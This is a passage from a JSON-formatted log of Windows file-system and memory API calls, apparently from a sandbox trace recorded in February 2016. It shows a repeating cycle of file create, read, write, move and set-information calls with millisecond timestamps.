"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,984", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,984", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,984", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,984", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,984", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,984", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,994", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,994", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,994", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,994", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,994", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,004", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,004", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,004", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,004", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,004", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,004", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,004", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,004", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,004", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,004", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,004", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,014", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,014", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,014", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,014", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,014", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,014", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,014", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,014", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,014", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,014", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,024", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,024", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,024", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,024", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,024", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,024", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,024", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,024", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,034", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,034", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,034", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,034", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,034", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,034", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,034", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,034", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,044", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,044", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,044", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,044", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,044", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,044", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,044", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,044", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,044", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,044", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,044", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,054", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,054", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,054", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,054", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,054", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,054", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,064", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,064", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,064", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,064", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,064", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,064", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,064", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,064", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,064", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,064", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,064", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,064", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,074", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,074", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,074", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,074", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,074", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,074", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,074", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,074", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,074", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,074", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,084", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,084", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,084", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,084", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,084", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,084", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,084", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,084", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,084", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,084", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,084", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,094", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,094", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,094", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,094", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,094", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,094", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,094", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,094", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,094", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,094", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,094", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,094", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,094", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,094", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,104", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,104", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,104", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,104", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,104", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,104", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,104", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,104", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,104", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,104", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,114", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,114", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,114", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,114", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,114", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,114", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,114", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,114", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,114", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,114", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,114", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,114", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,114", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,114", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,114", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,124", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,124", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,124", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,124", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,124", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,124", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,124", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,124", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,124", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,134", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,134", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,134", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,134", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,134", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,134", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,134", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,134", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,134", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,144", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,144", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,144", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,144", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,144", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,144", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,144", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,144", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,144", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,144", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,144", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,154", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,154", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,154", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,154", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,154", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,154", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,154", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,154", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,154", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,164", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,164", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,164", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,164", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,164", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,164", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,164", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,164", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,164", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,164", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,164", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,174", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,174", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,174", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,174", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,174", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,174", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,174", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,174", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,174", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,174", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,184", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,184", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,184", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,184", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,184", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,184", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,184", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,184", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,194", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,194", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,194", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,194", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,194", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,194", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,194", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,194", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,194", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,194", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,194", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,204", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,204", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,204", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,204", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,204", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,204", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,204", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,204", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,204", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,204", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,214", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,214", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,214", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,214", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,214", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,214", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,214", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,214", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,214", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,214", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,214", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,224", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,224", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,224", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,224", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,224", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,224", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,224", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,224", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,234", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,234", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,244", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,244", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,244", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,244", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,244", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,244", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,244", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,244", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,244", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,244", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,244", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,244", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,244", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,254", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,254", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,254", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,254", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,254", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,254", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,254", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,254", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,254", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,254", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,264", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,264", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,264", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,264", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,264", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,264", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,264", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,264", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,264", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,264", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,264", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,274", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,274", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,274", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,274", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,274", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,274", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,274", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,274", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,274", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,274", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,274", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,274", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,284", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,284", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,284", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,284", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,284", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,284", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,284", "api": "NtCreateFile"}, 